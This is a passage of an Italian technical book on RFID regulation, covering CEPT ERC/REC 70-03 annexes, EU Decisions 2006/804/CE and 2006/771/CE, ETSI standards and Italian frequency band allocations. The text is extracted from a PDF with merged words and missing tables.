Le Direttive del Parlamento Europeo che superano eventuali standardnazionali. Ad esempio la celebre Direttiva su “Radio andTelecommunications Terminal Equipment and the mutual recognitionof their conformity” (aprile 2000), volta all’autocertificazione dei pro-dotti, nota come “Direttiva R&TTE”.

I cosiddetti standard armonizzati “Harmonised Standards” che conten-gono le serie di test che possono essere usati per dimostrare la compati-bilità degli apparati. Ad esempio gli standard Cenelec ed ETSI che defi-niscono la Compatibilità elettro-magnetica per apparati SRD e RFID.

In particolare, per quanto concerne la tecnologia RFID i documentirilevanti sono:- La Raccomandazione ERC/REC 70-03 ed i suoi annessi definisconol’allocazione delle bande di frequenza per Short Range Devices (SRDs)(la tecnologia RFID) tra i paesi appartenenti alla CEPT. LaRaccomandazione viene gestita in ambito CEPT dallo “Short RangeDevices Maintenance Group” (SRD/MG), che dipende dal “WorkingGroup FM (Frequency Management)”.

- Le Decisioni ERC/ERO (oggi ECC/ERO) “adottate” come illustrato inprecedenza.

Per illustrare la situazione, nei paragrafi che seguono vengono elencati:- Gli “annessi” della Raccomandazione CEPT ERC/REC 70-03 [65]come appaiono nella versione più recente in data 17 Novembre 2005.

PARTE VII - ALLOCAZIONE IN FREQUENZA309

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 309

Page 296: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Gli annessi definiscono l’allocazione delle bande per la tecnologiaRFID in Europa. In particolare:- l’Annesso 9 “Inductive applications”;- l’Annesso 1 “Non-specific Short Range Devices”;- l’Annesso 11 “Radio frequency identification applications”.

- Le decisioni (ad oggi) dell’ECC/ERO (in passato ERC/ERO) sull’allo-cazione delle bande di frequenza.

- I principali standard ETSI attinenti la materia.Va altresì segnalato che la Commissione Europea ha, di recente adotta-

to due “Decisioni” (2006/804/CE cfr. § VII.2.4 e 2006/771/CE cfr. §VII.2.5) che trattano rispettivamente degli RFID con TAG passivi inbanda UHF media (865 ÷ 868 MHz) e dei Non-specific SRD (che com-prendono anche alcuni RFID con TAG attivi) nelle bande UHF media(868 ÷ 870 MHz), UHF alta (2,5 GHz) e su alcune bande HF (27 MHz),VHF (40 MHz), SHF (5,7 GHz).Le due Decisioni sanciscono sostanzialmente la stessa regolamentazio-

ne contenuta negli annessi 1 e 11 della Raccomandazione CEPT/REC/70-03 per le bande corrispondenti.

ERC/REC 70-03 - ANNESSO 9 “INDUCTIVE APPLICATIONS”Questo annesso della Raccomandazione ERC/REC 70-03 definisce bandedi frequenze ed alcuni parametri tecnici (canalizzazione, potenze di emis-sione, tecniche di interrogazione, ecc) per le tecnologie SRD di tipo indut-tivo (inclusi RFID).L’annesso copre i parametri frequenza/potenza per la maggior parte

degli RFID ad accoppiamento induttivo. Tuttavia, per completezza, va con-siderato anche l’annesso 1 in cui vengono citate delle bande (a, b, c) in cuiè previsto anche il funzionamento ad accoppiamento induttivo per appara-ti SRD (si ricorda che la sigla SRD comprende anche applicazioni RFID).I dati della tabella che segue sono tratti da ERC/REC 70-03 e dalla

Direttiva R&TTE indicando la corrispondenza delle bande, l’esistenza diDecisioni dell’ERC/ERO (ECC/ERO) e l’effettiva allocazione dellebande in Italia.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva310

VII.2.1

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 310

Page 297: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Tra le applicazioni si ricordano: immobilizzatori per autovetture, iden-tificazione di animali, sistemi di allarme, rilevamento di cavi, gestione dimateriali, identificazione di persone, controllo accessi, lettori e sensori diprossimità, sistemi antitaccheggio a radiofrequenza/induzione, identifica-zione automatica di articoli, sistemi di controllo senza fili e pagamentostradale automatico.

Note generali alla Tabella VII.2:- Gli utilizzatori devono essere consapevoli che le emissioni di apparatiinduttivi possono interferire con ricevitori (vicini) di altri servizi radio.Particolare attenzione dovrebbe essere rivolta ai più stringenti requisiti diprotezione identificati dall’ITU per frequenze ad uso di comunicazioni disoccorso e sicurezza globali nelle stesse bande o in bande adiacenti.

- Non sono previste canalizzazioni delle bande.- Non sono previste limitazioni nel “Duty Cycle”.- Standard armonizzato EN 300 330.

Note particolari alla Tabella VII.2:<1> Se vengono usate antenne esterne al dispositivo, queste devono esse-

re del tipo a spira (loop coil antenna). La lunghezza di ogni spiradeve essere <30 m.L’intensità del campo deve ridursi di 3 dB/oct a 30 kHz.

<2> Decisioni recenti. Possono ancora esserci eccezioni in stati membri(non in Italia).

<3> Direttiva R&TTE:9÷20,05 kHz —>72 dBmA/m a 10m.20,05÷59.,75 kHz —>42 dBmA/m a 10m.

<4> Solo per uso con RFID e EAS.Direttiva R&TTE —>42 dBmA/m a 10m.

<5> Applicazione prevalente: ISO/IEC 18000-2, 125 kHz e 134,2 kHz.<6> Nel caso di antenne a spira nelle bande aa) e ac) aventi una superfi-

cie compresa tra 0,05 m2 e 0,16 m2, l’intensità del campo si riduce di10*log (area/0,16 m2); per una superficie d’antenna inferiore a 0,05m2 l’intensità del campo si riduce di 10 dB.

PARTE VII - ALLOCAZIONE IN FREQUENZA311

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 311

Page 298: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva312

Tabella VII.2ERC/REC 70-03 Annesso 9 “Inductive

applications” indicando anche eventuali“Decisioni”

301-338.qxp:rfid 9-09-2008 15:19 Pagina 312

Page 299: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ERC/REC 70-03 - ANNESSO 1 “NON-SPECIFIC SHORT RANGE DEVICES”Questo annesso della Raccomandazione ERC/REC 70-03 definisce bandedi frequenze ed alcuni parametri tecnici (canalizzazione, potenze di emis-sione, ecc.) per le tecnologie SRD dedicate prevalentemente a Telemetria,Telecomandi, Allarmi, trasmissione dati, ecc.Si ricorda che la sigla SRD comprende anche applicazioni RFID, infat-

ti su queste bande possono essere allocate anche applicazioni di questogenere (es. TAG attivi).I dati della tabella che segue sono tratti da ERC/REC 70-03 e dalla

Direttiva R&TTE indicando la corrispondenza delle bande, l’esistenza diDecisioni dell’ERC/ERO (ECC/ERO) e l’effettiva allocazione dellebande in Italia.EN 300 220 definisce anche la tecnica Listen Before Talk (LBT) con

l’opzione cosiddetta “Adaptive Frequency Agility” (AFA) che può esserepreferibilmente utilizzata al posto del “Duty Cycle”.

Note alle Tabelle VII.3 e VII.4:<1> Per dispositivi a singola frequenza si applicano le limitazioni sul

“Duty Cycle”, a meno che non si usi l’LBT. Per dispositivi FHSS,DSSS o AFA, il “Duty Cycle” si applica globalmente alla trasmissio-ne a meno che non si usi l’LBT.

<2> La canalizzazione preferita è 100 kHz che consente una ulterioresuddivisione in 50 kHz o 25 kHz.

<3> Sono escluse sottobande per allarmi (vedi ERC/Rec. 70 - 03 Annex7).

<4> Sono escluse applicazioni audio e voce.<5> Il “Duty Cycle” può essere incrementato all’1% se la banda è limi-

tata a 865 – 868 MHz.<6> Per modulazioni a larga banda che non siano FHSS e DSSS con una

banda compreasa tra 200 kHz e 3 MHz, il “Duty Cycle” può essereincrementato all’1% se la banda è limitata a 865 – 868 MHz e lapotenza risulta ≤10 mW e.r.p.

<7> Per altre modulazioni a banda stretta con una banda compresa tra50 kHz e 200 kHz, la banda è limitata a 865,5 – 867,5 MHz.

PARTE VII - ALLOCAZIONE IN FREQUENZA313

VII.2.2

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 313

Page 300: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

<8> La densità di potenza può essere incrementata a +6.2 dBm/100 kHze +0.8 dBm/100 kHz, se la banda è limitata a 865 – 868 MHz e a865 – 870 MHz rispettivamente.

Note sulle frequenze.- Le bande negli Annessi 1: a - b - c - d - f – f1 – f2 – h – i - j - k - l ed

m sono anche designate per applicazioni industriali, scientifiche emediche (ISM) come definito nella regolamentazione ITU.

- La banda di frequenze adiacente, al di sopra di 870 MHz è stata desi-gnata per l’uso di sistemi TETRA ad elevata potenza e di altri sistemiradiomobili PMR/PAMR (Professional Mobile Radio/Public AccessMobile Radio) digitali.

- I produttori devono tenere in conto questo nella progettazione degliapparati e nella scelta dei livelli di potenza.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva314

Tabella VII.3Parte prima: ERC/REC 70-03 Annesso 1“Non-specific Short Range Devices”,

indicando anche eventuali “Decisioni”.

Nota: la banda E 138,2 ÷ 138,45non è assegnata in Italia.

301-338.qxp:rfid 10-09-2008 11:43 Pagina 314

Page 301: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA315

Tabella VII.4Parte seconda: ERC/REC 70-03 Annesso 1

“Non-specific Short Range Devices”,indicando anche eventuali “Decisioni”.

301-338.qxp:rfid 10-09-2008 11:43 Pagina 315

Page 302: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ERC/REC 70-03 - ANNESSO 11 “RADIO FREQUENCY IDENTIFICATION

APPLICATIONS”

Questo annesso della Raccomandazione ERC/REC 70-03 definiscebande di frequenze ed alcuni parametri tecnici (canalizzazione, potenzedi emissione, tecniche di interrogazione, ecc) dedicate prevalentemente atecnologie RFID. Altri tipi di sistemi RFID possono comunque operarein conformità con altri annessi pertinenti.Si tratta dell’annesso più “critico” in quanto in quanto solo di recen-

te suffragato da “Decisioni” della Commissione UE (cfr. §VII.2.4 e§VII.2.5) vincolanti per gli stati membri.I dati della tabella che segue sono tratti da ERC/REC 70-03 e dalla

Direttiva R&TTE indicando la corrispondenza delle bande, l’esistenza diDecisioni dell’ERC/ERO (ECC/ERO) e l’effettiva allocazione dellebande in Italia.Tra le applicazioni si ricordano: identificazione automatica di oggetti,

tracciamento di oggetti, sistemi di allarme, gestione scorte e materiali,identificazione persone, controllo accessi, lettori e sensori di prossimità,sistemi antitaccheggio, radiolocalizzazione, trasferimento dati ad apparatiportatili, sistemi di controllo senza fili.

Note sulle frequenzeSottobanda a)- Per facilitare le autorità di controllo ogni emissione dovuta a dispositi-vi RFID quando misurata all’esterno del fabbricato, ad una distanza di10 metri, non deve superare l’intensità di campo equivalente a quellodi un dispositivo RFID a 500 mW montato all’esterno del fabbricato emisurato alla stessa distanza. Nel caso in cui il fabbricato sia compostoda più locali (ad esempio negozi all’interno di un centro commerciale)allora le misure vanno riferite al confine dei locali dell’utente all’inter-no dell’edificio.

- Tecniche di tipo Frequency Hopping dovrebbero usate come “mezzi dimitigazione” quando vengono impiegate potenze maggiori di 500 mWe.i.r.p..

RFID - Fondamenti di una tecnologia silenziosamente pervasiva316

VII.2.3

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 316

Page 303: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Sottobande b1), b2) e b3)Le frequenze centrali di ogni canale sono così calcolate: 864,9 MHz + (0,2MHz * numero di canale).I numeri dei canali disponibili per ognuna delle sottobande sono:b1: numeri di canale da 1 a 15.b2: numeri di canale da 4 a 13.b3: numeri di canale da 4 a 15.Non deve essere utilizzata la tecnica “Frequency Hopping” od altre ditipo “Spread Spectrum”.

Parametri tecnici (riferiti anche agli standard armonizzati)Sottobanda a)Come menzionato nello standard EN 300 440 l’antenna deve avere:- <= +/- 45 gradi in orizzontale di “beamwidth” e- >=15 dB di attenuazione dei lobi laterali.Inoltre, un dispositivo RFID che può superare i 500 mW, deve essere

dotato di un controllo automatico di potenza per ridurre la potenza irra-diata sotto i 500 mW; questo controllo deve garantire la riduzione dellapotenza ad un valore massimo di 500 mW nei casi in cui il dispositivoviene spostato al di fuori dei confini dell’edificio o dei locali dell’utentecome descritto in precedenza.Sottobande b1), b2) e b3)Come menzionato nello standard EN 302 208 l’antenna deve avere“beamwidth” orizzontale:- <= +/- 45 gradi per una potenza irradiata di 100-500 mW e- <= +/- 35 gradi per una potenza irradiata di 500 mW - 2 W.

PARTE VII - ALLOCAZIONE IN FREQUENZA317

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 317

Page 304: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

LA DECISIONE DELLA COMMISSIONE EUROPEA SULLE BANDE UHF PERRFIDDi particolare interesse, per gli RFID con TAG passivi sulle bande UHF,è la recente “Decisione” della Commissione Europea “relativa all’armo-nizzazione dello spettro radio per le apparecchiature di identificazione aradiofrequenza (RFID) che operano nella banda UHF (Ultra-HighFrequency)” [147].La Decisione porta la data del del 23 novembre 2006 (identificativo

2006/804/CE) ed è stata pubblicata sulla Gazzetta ufficiale dell’Unioneeuropea (versione italiana) del 25.11.2006.La Decisione sancisce la stessa regolamentazione contenuta nell’annes-

so 11 della Raccomandazione CEPT/REC/70-03 per le bande b1 -865÷868 MHz; b2 - 865,6÷867,6 MHz; b3 - 865,6÷868 MHz.)I Paesi Membri pertanto, dovranno adeguarsi in tempi brevi, salvo spe-

cifiche e motivate deroghe comunque limitate nel tempo. L’Italia si è ade-guata con il Decreto Ministeriale [149].Si riporta nel seguito un estrattocommentato degli articoli e delle tabelle più importanti della decisione.- La “Decisione” riguarda esplicitamente solo sistemi RFID che operano

RFID - Fondamenti di una tecnologia silenziosamente pervasiva318

Tabella VII.5ERC/REC 70-03 Annesso 11 “Radio frequencyidentification applications”, indicando anche

“Decisioni”

VII.2.4

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 318

Page 305: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

con TAG passivi ad accoppiamento elettromagnetico (art. 2).- Sono inoltre richieste:- Conformità con le prescrizioni di base della direttiva R&TTE.- Tecnica di interrogazione del Reader “Listen-Before-Talk” a normadella norma ETSI EN 302 208 adottata dalla direttiva 1999/5/CE.

- I sistemi sono allocati su bande condivise con altri servizi di radioco-municazione (classificati, implicitamente, come prioritari), sono quindivincolati ad operare “senza interferenza e senza protezione” (art. 2).Ovvero:- Non ci devono essere interferenze dannose per i servizi di radioco-municazione.

- Non si può pretendere la protezione di queste apparecchiature dainterferenze dannose derivanti da servizi di radiocomunicazione.

- Le norme principali sono contenute nell’Articolo 3, in cui:1. Gli Stati membri designano e rendono disponibili, entro sei mesia decorrere dall’entrata in vigore della presente decisione, in modonon esclusivo, senza interferenze e senza protezione, le bande di fre-quenza destinate alle apparecchiature RFID, soggette alle condizio-ni specifiche, di cui all'allegato alla presente decisione.2. Fatto salvo il paragrafo 1, gli Stati membri possono richiedereperiodi di transizione e/o meccanismi di ripartizione dello spettroradio, a norma dell’articolo 4, paragrafo 5, della decisione sullo spet-tro radio.

L’allegato con la tabella Frequenze/Potenze, ricalca fedelmente l’an-nesso 11 della più volte citata ECR/REC 70-03, se ne riporta comunque,per completezza, qui di seguito il testo.

PARTE VII - ALLOCAZIONE IN FREQUENZA319

Tabella VII.6Frequenze, potenze e canalizzazioni previste

nella Decisione 2006/804/CE

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 319

Page 306: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Note alla tabella VII.6:- Le frequenze centrali di canale sono pari a 864,9 MHz + (0,2 MHz xnumero del canale).

- I numeri di canale disponibili per ciascuna sottobanda sono:- Sottobanda A: numeri di canale da 1 a 3;- Sottobanda B: numeri di canale da 4 a 13;- Sottobanda C: numeri di canale da 14 a 15.

- La stessa apparecchiatura può operare in più sottobande.

LA DECISIONE DELLA COMMISSIONE EUROPEA SULLE BANDE PER SRD

Di particolare interesse, per gli RFID con TAG attivi sulle bande UHF, èla recente “Decisione” della Commissione Europea “relativa all’armoniz-zazione dello spettro radio per l'utilizzo da parte di apparecchiature acorto raggio” (Non specific SRD) [148].La Decisione porta la data del del 9 novembre 2006 (identificativo

2006/771/CE) ed è stata pubblicata sulla Gazzetta ufficiale dell’Unioneeuropea (versione italiana) del 11.11.2006.La Decisione sancisce una regolamentazione che riprende quanto con-

tenuto negli Annessi 1 e 9 della Raccomandazione CEPT/REC/70-03 perle bande corrispondenti, ovvero: UHF media (433,05 ÷ 434,79 MHz),UHF alta (2,5 GHz) e su alcune bande HF (27 MHz), VHF (40 MHz),SHF (5,7 GHz).L’interesse, ai fini dei sistemi RFID, consiste nel fatto che diversi TAG

attivi (e relativi Reader) operano come “Non specific SRD”.I Paesi Membri pertanto, dovranno adeguarsi in tempi brevi, salvo spe-

cifiche e motivate deroghe comunque limitate nel tempo. L’Italia si è ade-guata con il Decreto Ministeriale [149].

Si riporta nel seguito un estratto commentato degli articoli e delletabelle più importanti della decisione.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva320

VII.2.5

301-338.qxp:rfid 9-09-2008 15:19 Pagina 320

Page 307: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Articolo 1La presente decisione mira ad armonizzare le bande di frequenza e i relativiparametri tecnici per la messa in servizio e l’uso efficiente dello spettro radioper le apparecchiature a corto raggio in modo che tali apparecchiature possa-no beneficiare della classificazione "classe 1" ai sensi della decisione2000/299/CE.

Articolo 2Ai fini della presente decisione si intende per:1) "apparecchiatura a corto raggio", radiotrasmettitori che trasmettonocomunicazioni unidirezionali o bidirezionali a brevi distanze e a bassapotenza;2) "su base di non interferenza e senza diritto a protezione" significa che nes-suna interferenza pregiudizievole può essere causata a qualsiasi servizio diradiocomunicazione e che non può essere chiesta la protezione di questeapparecchiature da interferenze pregiudizievoli derivanti da servizi di radio-comunicazione.

Articolo 31) Gli Stati membri designano e rendono disponibili, su una base non esclusi-va, senza interferenze e senza diritto a protezione, le bande di frequenza per leapparecchiature a corto raggio, soggette alle condizioni specifiche di cui all'al-legato della presente decisione, nei termini stabiliti nello stesso allegato.– Nota: le bande di frequenza e le potenze recepiscono quelle previste negliAnnessi 1 e 9 della ECR/REC 70-032) Fatto salvo il paragrafo 1, gli Stati membri possono richiedere periodi ditransizione e/o meccanismi di condivisione dello spettro radio, a norma del-l’articolo 4, paragrafo 5, della decisione sullo spettro radio.3) La presente decisione non pregiudica il diritto degli Stati membri di auto-rizzare l’uso delle bande di frequenza a condizioni meno restrittive rispettoa quelle previste nell’allegato della presente decisione.

PARTE VII - ALLOCAZIONE IN FREQUENZA321

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 321

Page 308: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ALLEGATO:Bande di frequenza armonizzate e parametri tecnici ai fini dell’usodelle apparecchiature a corto raggioTermine di attuazione 1-giugno-2007 per tutti i tipi di apparecchiature etutte le bande

Apparecchiature a corto raggio non specifiche:

Questa categoria comprende tutti i tipi di applicazioni che soddisfano le con-dizioni tecniche (ad esempio strumenti di telemetria, i telecomandi, gli allar-mi, i dati in generale ed altre applicazioni analoghe).

RFID - Fondamenti di una tecnologia silenziosamente pervasiva322

Tabella VII.7Frequenze, potenze e canalizzazionipreviste nella Decisione 2006/771/CE

per SRD non specificiLegenda:Duty Cycle Per “Duty Cycle” (ciclo di

funzionamento) s’intende laproporzione di tempo in unperiodo di un’ora durante la qualeun’apparecchiatura trasmette.

e.r.p. potenza equivalente irradiatae.i.r.p. potenza isotropa equivalente

irradiata

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 322

Page 309: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Applicazioni induttive:

questa categoria comprende, ad esempio, apparecchiature per:– immobilizzazione dei veicoli– identificazione degli animali– sistemi di allarme– rilevazione di cavi– gestione dei rifiuti– identificazione delle persone– collegamenti vocali senza filo– controllo dell'accesso– sensori di prossimità– sistemi antifurto ivi compresi i sistemi antifurto ad induzione RF– trasferimento di dati verso dispositivi palmari– identificazione automatica di articoli– sistemi di controllo senza filo– riscossione automatica dei pedaggi stradali

PARTE VII - ALLOCAZIONE IN FREQUENZA323

Tabella VII.8Frequenze e potenze previste nella Decisione

2006/771/CE per Applicazioni induttive

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 323

Page 310: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva324

Figura VII.3Racc. ERC: CEPT/DEC 70-03 annessi 1

(banda SRD) ed 11 (banda RFID).Pianificazione della banda 868 – 870 MHz &valori di potenza permessi dopo le Decisioni

della Commissione UE 2006/804/CE e 2006/771/CE

Profilo della potenza consentita altrasmettitore nei 15 canali da 200 kHzpermessi in Europa nella banda UHF865÷868 MHz [ETSI EN302-208]

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 324

Page 311: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA325

DECISIONI DELL’EUROPEAN RADIOCOMMUNICATIONS COMMITTEEVII.2.6Tabella VII.9

Decisioni sulle frequenze armonizzate, sullecaratteristiche tecniche

e sulle esenzioni dalle licenze individuali

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 325

Page 312: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva326

STANDARD ETSIVII.2.7

Tabella VII.10Standard ETSI di riferimento

per i sistemi RFID

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 326

Page 313: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA327

NORMATIVA NAZIONALEIn questo paragrafo viene illustrata la situazione italiana relativa all’alloca-zione delle bande di frequenza per la tecnologia RFID. La normativanazionale è riassunta nel “PNRF – Piano Nazionale di Ripartizione delleFrequenze” (d.M. 8 luglio 2002 – Ministero delle Comunicazioni) [59].I riferimenti sono, come illustrato in precedenza, la RaccomandazioneERC/REC 70-03 [65], la Direttiva R&TTE, le Decisioni dell’ERC/ERO(ECC/ERO) e, soprattutto, il recente riordino delle frequenze in Europaattuato con le Decisioni della Commissione UE 2006/804/CE, cfr. § 6.2.4e 2006/771/CE, cfr. §VII.2.5, recepite con decreto Ministeriale 12 Luglio2007 “Modifica al vigente piano nazionale di ripartizione delle frequen-ze” [149].I paragrafi che seguono sono dedicati all’illustrazione della situazione

nelle principali bande di di lavoro di sistemi RFID in Italia:- Bande in LF (9 kHz – 135 kHz);- Banda HF (centrata su 13,56 MHz);- Bande in UHF media (865 ÷ 870 MHz).Nelle tabelle che seguono, per illustrare la situazione italiana, si fa rife-

rimento:- alla banda di frequenze nazionali;- al gestore (Ministero delle Comunicazioni o della Difesa);- all’impiego (con riferimento al PNRF);- al confronto con la normativa europea, con riferimento alle DecisioniECC (ERC).Vengono inoltre illustrate situazioni relative a bande di frequenza nelle

quali, pur non essendo previsto l’uso di sistemi RFID per applicazioniindustriali, sarebbe possibile operare con apparati a radiofrequenza acorto raggio non destinati ad uso specifico (SRD – Short Range Devices)seppur con forti limitazioni sulle potenze emesse. Considerando che sualcune di queste bande (ad esempio 433 MHz e 2,5 GHz) operano TAGRFID in differenti regioni del mondo, ne sarebbe ipotizzabile l’interroga-zione, con qualche difficoltà, anche sul nostro territorio, non foss’altroche per acquisirne il contenuto ed eventualmente trasferirlo su TAG diuso più agevolole.

VII.3

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 327

Page 314: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva328

Conclude il capitolo un cenno alle tecniche a banda ultra larga e dis-persione di spetto UWB (Ultra Wide Band).Queste tecniche superano in un certa misura il problema della divisione

dello spettro radio in bande e della loro assegnazione e risultano partico-larmente promettenti per applicazioni con RFID attivi ad alte prestazioni.

PRINCIPALI BANDE RFID NAZIONALI

3.1.1 Bande in LF (9 kHz – 135 kHz)

In Italia è possibile utilizzare sistemi RFID induttivi (SRD – Short RangeDevices per applicazioni di tipo induttivo) lavorando su frequenze appar-tenenti all’intervallo 9,0 ÷ 135 kHz, come specificato nella Nota 1 dellatab. A del PNRF (riportata integralmente nel paragrafo successivo).Tale intervallo di frequenze è leggermente disallineato (più ampio) con

quello definito a livello europeo.Comunque le frequenze di maggior interesse sono quelle definite dallo

standard ISO/IEC 18000-2. Le due principali frequenze sono entrambedi uso globale:

VII.3.1

Tabella VII.11Allocazione italiana della banda LF (9 kHz –135 kHz e bande seguenti) con riferimento

alla normativa europea

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 328

Page 315: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA329

- 125 kHz per i cosiddetti TAG FDX alimentati in permanenza dalReader anche durante la trasmissione dal TAG al Reader.

- 134,2 kHz per i cosidetti TAG HDX alimentati dal Reader solo duran-te l’interrogazione.Negli Stati Uniti, la banda dedicata a sistemi RFID è più ristretta, com-

presa nell’intervallo: 110 – 130 kHz.

3.1.2 Banda in HF (centrata su 13,56 MHz)

Le applicazioni più interessanti sono i sistemi RFID passivi che operanosulla frequenza 13,56 MHz e rientrano nella categoria degli SRD perapplicazioni di tipo induttivo. La normativa ETSI di riferimento è la EN300-330-01. La banda è di uso globale.In Italia questa banda viene utilizzata in accordo con la Nota 1 della

tab. A del PNRF (riportata integralmente qui di seguito).

Note dalla tab. A PNRF concernenti la banda 13,410 ÷ 13,570 MHz:<1> In accordo con le decisioni CEPT ERC/DEC/(01)13,

ERC/DEC/(01)14, ERC/DEC/(01)15 e ERC/DEC/(01)16 lebande di frequenze

- 9 ÷ 135 kHz

Tabella VII.12Allocazione italiana della bandaHF (13,56 MHz e bande seguenti)

con riferimento alla normativa europea

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 329

Page 316: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva330

- 6,765 ÷ 6,795 kHz- 7,400 ÷ 8,800 kHz- 13,553 ÷ 13,567 kHz- 26,957 ÷ 27,283 kHz

possono essere impiegate ad uso collettivo da apparati a corto rag-gio per applicazioni di tipo induttivo aventi le caratteristiche tecni-che della raccomandazione CEPT ERC/REC 70-03 (Annesso 9).Tali applicazioni rientrano negli scopi di cui al dPR 5 ottobre 2001,n. 447, articolo 6, comma 1, lettera g). [applicazioni sono soggetteal regime di "libero uso"]

<36> In accordo con le decisioni CEPT ERC/DEC/(01)01,ERC/DEC/(01)02 e ERC/DEC/(01)03 frequenze delle bande- 6.765 ÷ 6.795 kHz- 13.553 ÷ 13.576 kHz- 26.957 ÷ 27.283 kHz- 40,66 ÷ 40,70 MHzpossono essere impiegate ad uso collettivo da apparati a corto rag-gio non destinati ad impieghi specifici, aventi le caratteristiche tec-niche della raccomandazione CEPT ERC/REC 70-03 (Annesso 1).Tali applicazioni rientrano negli scopi di cui al dPR 5 ottobre 2001,n. 447, articolo 6, comma 1, lettera q).

<43> Le bande di frequenze- 13.553 ÷ 13.567 kHz (frequenza centrale 13.560 kHz)- 26.957 ÷ 27.283 kHz (frequenza centrale 27.120 kHz)- 40,66 ÷ 40,70 MHz (frequenza centrale 40,68 MHz)- 2.400 ÷ 2.500 MHz (frequenza centrale 2.450 MHz)- 5.725 ÷ 5.875 MHz (frequenza centrale 5.800 MHz)- 24,00 ÷ 24,25 GHz (frequenza centrale 24,125 GHz)sono anche utilizzate dagli apparecchi per applicazioni industriali,scientifiche e medicali (ISM). I servizi di radiocomunicazione ope-ranti in queste bande devono accettare i disturbi pregiudizievoliche possono verificarsi a causa delle citate applicazioni. Ogni misu-ra praticamente possibile deve essere adottata per assicurare che leirradiazioni delle apparecchiature usate per tali applicazioni siano

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 330

Page 317: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA331

minime e che al di fuori della banda il livello delle irradiazioni siatale da non causare disturbi pregiudizievoli ai servizi di radioco-municazione ed in particolare alla radionavigazione e ad ogni altroservizio di sicurezza operante in accordo con le prescrizioni delpresente piano.

3.1.3 Bande in UHF media (865 ÷ 870 MHz)

Si tratta sicuramente della banda più critica per le applicazioni RFID perl’affermazione sul mercato mondiale dei nuovi TAG passivi Gen2, cheoperano su queste bande, come vari modelli di TAG attivi.Per questa banda va rilevato il recente recepimento della Decisione

2006/804/CE e 2006/771/CE, con decreto Ministeriale 12 Luglio 2007“Modifica al vigente piano nazionale di ripartizione delle frequenze”[149].In Italia il PNRF prevede che questa banda sia gestita dal Ministero della

Difesa, attribuita ad uso fisso e mobile per scopi militari (probabilmentesistemi di comunicazione punto-punto trasportabili). Tuttavia in questabanda sono possibili anche applicazioni civili (segnatamente SRD generici,allarmi, applicazioni audio) purché non interferiscano con quelle militari.Negli Stati Uniti, la banda UHF media dedicata ad applicazioni SRD e

RFID è centrata sui 915 MHz ed è compresa nell’intervallo: 902 – 928MHz, mentre le corrispondenti bande europee dedicate (vedi tabelle)sono così assegnate negli USA:851 – 869 MHz: traffico radio mobile privato;869 – 894 MHz: traffico telefonico cellulare.Per contro, in Europa (e in Italia) non è possibile utilizzare le frequen-

ze statunitensi poiché ne è prevista l’occupazione dal sistema di comuni-cazione mobile GSM. In particolare, il PNRF italiano prevede le seguen-ti assegnazioni:880 – 915 MHz: traffico GSM, ETACS;915 – 921 MHz: riservato al Ministero della Difesa.

2-parteVII.qxp:rfid 5-09-2008 11:01 Pagina 331

Page 318: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva332

Note alla Tabella VII.13:<a> A potenza massima, sono previsti i seguenti canali, tutti con lar-

ghezza pari a 200 kHz (cfr. Figura VII.3):- 3 canali da 100 mW,- 10 canali da 2 W,- 2 canali da 500 mW.

